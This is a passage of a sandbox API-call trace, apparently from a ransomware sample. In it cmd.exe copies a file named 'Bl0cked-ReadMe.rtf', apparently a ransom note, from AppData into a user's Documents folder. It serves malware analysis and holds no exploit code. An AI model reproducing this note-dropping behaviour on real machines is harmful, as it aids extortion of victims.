"c:\\users\\eebsym5\\desktop")) returned 0x11 [0135.932] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f3b4 | out: lpFindFileData=0x12f3b4) returned 0x33fff8 [0135.932] FindClose (in: hFindFile=0x33fff8 | out: hFindFile=0x33fff8) returned 1 [0135.932] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f3b4 | out: lpFindFileData=0x12f3b4) returned 0x33fff8 [0135.932] FindClose (in: hFindFile=0x33fff8 | out: hFindFile=0x33fff8) returned 1 [0135.932] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f3b4 | out: lpFindFileData=0x12f3b4) returned 0x33fff8 [0135.932] FindClose (in: hFindFile=0x33fff8 | out: hFindFile=0x33fff8) returned 1 [0135.932] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0135.932] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0135.932] SetEnvironmentVariableW (lpName="=C:", 
lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0135.933] GetEnvironmentStringsW () returned 0x342ad8* [0135.933] FreeEnvironmentStringsW (penv=0x342ad8) returned 1 [0135.933] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0135.933] GetConsoleOutputCP () returned 0x1b5 [0135.933] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0135.933] GetUserDefaultLCID () returned 0x409 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f778, cchData=128 | out: lpLCData="0") returned 2 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f778, cchData=128 | out: lpLCData="0") returned 2 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f778, cchData=128 | out: lpLCData="1") returned 2 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0135.934] 
GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0135.935] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0135.936] GetConsoleTitleW (in: lpConsoleTitle=0x3308d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.936] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0135.936] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0135.936] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0135.936] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0135.937] _wcsicmp (_String1="type", _String2=")") returned 75 [0135.937] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0135.937] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0135.937] _wcsicmp (_String1="IF", _String2="type") returned -11 [0135.937] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0135.937] _wcsicmp (_String1="REM", _String2="type") returned -2 [0135.937] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0135.941] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.941] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.941] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.941] GetFileType (hFile=0x7) returned 0x2 [0135.941] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0135.942] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12f670 | out: lpMode=0x12f670) returned 1 [0135.942] _dup (_FileHandle=1) returned 3 [0135.942] _close (_FileHandle=1) returned 0 [0135.942] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0135.942] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf" (normalized: 
"c:\\users\\eebsym5\\docume~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x12f640, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0135.944] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0135.944] GetConsoleTitleW (in: lpConsoleTitle=0x12f470, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.944] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0135.944] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0135.944] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0135.944] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0135.944] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0135.945] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x12efd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12efd4) returned 0x330e50 [0135.945] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0135.945] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0135.945] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0135.945] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x12dee0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0135.945] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0135.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0135.945] GetFileType (hFile=0x54) returned 0x1 [0135.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0135.945] GetFileSize (in: 
hFile=0x54, lpFileSizeHigh=0x12df38 | out: lpFileSizeHigh=0x12df38*=0x0) returned 0x1632 [0135.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0135.945] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0135.946] ReadFile (in: hFile=0x54, lpBuffer=0x12ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12df60, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesRead=0x12df60*=0x200, lpOverlapped=0x0) returned 1 [0135.947] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.947] GetFileType (hFile=0x4c) returned 0x1 [0135.947] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.947] GetFileType (hFile=0x4c) returned 0x1 [0135.947] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.947] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.995] GetFileType (hFile=0x4c) returned 0x1 [0135.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.995] WriteFile (in: hFile=0x4c, lpBuffer=0x12edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12edc0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.995] GetFileType (hFile=0x4c) returned 0x1 [0135.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.995] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee10*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.995] GetFileType (hFile=0x4c) returned 0x1 [0135.995] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0135.995] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee60*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.995] GetFileType (hFile=0x4c) returned 0x1 [0135.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.995] WriteFile (in: hFile=0x4c, lpBuffer=0x12eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12eeb0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.995] GetFileType (hFile=0x4c) returned 0x1 [0135.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.995] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef00*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.995] GetFileType (hFile=0x4c) returned 0x1 [0135.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.995] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef50*, lpNumberOfBytesWritten=0x12df54*=0x20, lpOverlapped=0x0) returned 1 [0135.996] _get_osfhandle (_FileHandle=4) returned 0x54 [0135.996] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12df40 | out: lpNewFilePointer=0x0) returned 1 [0135.996] _get_osfhandle (_FileHandle=4) returned 0x54 [0135.996] ReadFile (in: hFile=0x54, lpBuffer=0x12ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12df60, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesRead=0x12df60*=0x200, lpOverlapped=0x0) returned 1 [0135.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.996] 
GetFileType (hFile=0x4c) returned 0x1 [0135.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.996] GetFileType (hFile=0x4c) returned 0x1 [0135.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.996] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.996] GetFileType (hFile=0x4c) returned 0x1 [0135.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.996] WriteFile (in: hFile=0x4c, lpBuffer=0x12edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12edc0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.996] GetFileType (hFile=0x4c) returned 0x1 [0135.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.996] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee10*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.996] GetFileType (hFile=0x4c) returned 0x1 [0135.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.996] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee60*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.997] GetFileType (hFile=0x4c) returned 0x1 [0135.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.997] WriteFile (in: hFile=0x4c, lpBuffer=0x12eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12eeb0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 
[0135.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.997] GetFileType (hFile=0x4c) returned 0x1 [0135.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.997] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef00*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.997] GetFileType (hFile=0x4c) returned 0x1 [0135.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.997] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef50*, lpNumberOfBytesWritten=0x12df54*=0x20, lpOverlapped=0x0) returned 1 [0135.997] _get_osfhandle (_FileHandle=4) returned 0x54 [0135.997] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12df40 | out: lpNewFilePointer=0x0) returned 1 [0135.997] _get_osfhandle (_FileHandle=4) returned 0x54 [0135.997] ReadFile (in: hFile=0x54, lpBuffer=0x12ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12df60, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesRead=0x12df60*=0x200, lpOverlapped=0x0) returned 1 [0135.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.997] GetFileType (hFile=0x4c) returned 0x1 [0135.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.997] GetFileType (hFile=0x4c) returned 0x1 [0135.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.997] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.997] GetFileType (hFile=0x4c) returned 0x1 [0135.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.997] WriteFile (in: hFile=0x4c, lpBuffer=0x12edc0*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12edc0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.998] GetFileType (hFile=0x4c) returned 0x1 [0135.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.998] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee10*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.998] GetFileType (hFile=0x4c) returned 0x1 [0135.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.998] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee60*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.998] GetFileType (hFile=0x4c) returned 0x1 [0135.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.998] WriteFile (in: hFile=0x4c, lpBuffer=0x12eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12eeb0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.998] GetFileType (hFile=0x4c) returned 0x1 [0135.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.998] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef00*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.998] GetFileType (hFile=0x4c) returned 0x1 [0135.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.998] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef50*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef50*, lpNumberOfBytesWritten=0x12df54*=0x20, lpOverlapped=0x0) returned 1 [0135.998] _get_osfhandle (_FileHandle=4) returned 0x54 [0135.998] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12df40 | out: lpNewFilePointer=0x0) returned 1 [0135.999] _get_osfhandle (_FileHandle=4) returned 0x54 [0135.999] ReadFile (in: hFile=0x54, lpBuffer=0x12ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12df60, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesRead=0x12df60*=0x200, lpOverlapped=0x0) returned 1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] GetFileType (hFile=0x4c) returned 0x1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] GetFileType (hFile=0x4c) returned 0x1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] GetFileType (hFile=0x4c) returned 0x1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] WriteFile (in: hFile=0x4c, lpBuffer=0x12edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12edc0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] GetFileType (hFile=0x4c) returned 0x1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee10*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] GetFileType 
(hFile=0x4c) returned 0x1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee60*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] GetFileType (hFile=0x4c) returned 0x1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] WriteFile (in: hFile=0x4c, lpBuffer=0x12eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12eeb0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] GetFileType (hFile=0x4c) returned 0x1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef00*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] GetFileType (hFile=0x4c) returned 0x1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef50*, lpNumberOfBytesWritten=0x12df54*=0x20, lpOverlapped=0x0) returned 1 [0136.000] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.000] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12df40 | out: lpNewFilePointer=0x0) returned 1 [0136.000] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.000] ReadFile (in: hFile=0x54, lpBuffer=0x12ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12df60, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesRead=0x12df60*=0x200, lpOverlapped=0x0) returned 1 [0136.000] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] GetFileType (hFile=0x4c) returned 0x1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] GetFileType (hFile=0x4c) returned 0x1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] GetFileType (hFile=0x4c) returned 0x1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] WriteFile (in: hFile=0x4c, lpBuffer=0x12edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12edc0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] GetFileType (hFile=0x4c) returned 0x1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee10*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] GetFileType (hFile=0x4c) returned 0x1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee60*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] GetFileType (hFile=0x4c) returned 0x1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] WriteFile (in: hFile=0x4c, lpBuffer=0x12eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12eeb0*, 
lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] GetFileType (hFile=0x4c) returned 0x1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef00*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] GetFileType (hFile=0x4c) returned 0x1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef50*, lpNumberOfBytesWritten=0x12df54*=0x20, lpOverlapped=0x0) returned 1 [0136.001] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.001] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12df40 | out: lpNewFilePointer=0x0) returned 1 [0136.001] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.001] ReadFile (in: hFile=0x54, lpBuffer=0x12ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12df60, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesRead=0x12df60*=0x200, lpOverlapped=0x0) returned 1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] GetFileType (hFile=0x4c) returned 0x1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] GetFileType (hFile=0x4c) returned 0x1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] GetFileType (hFile=0x4c) returned 0x1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c 
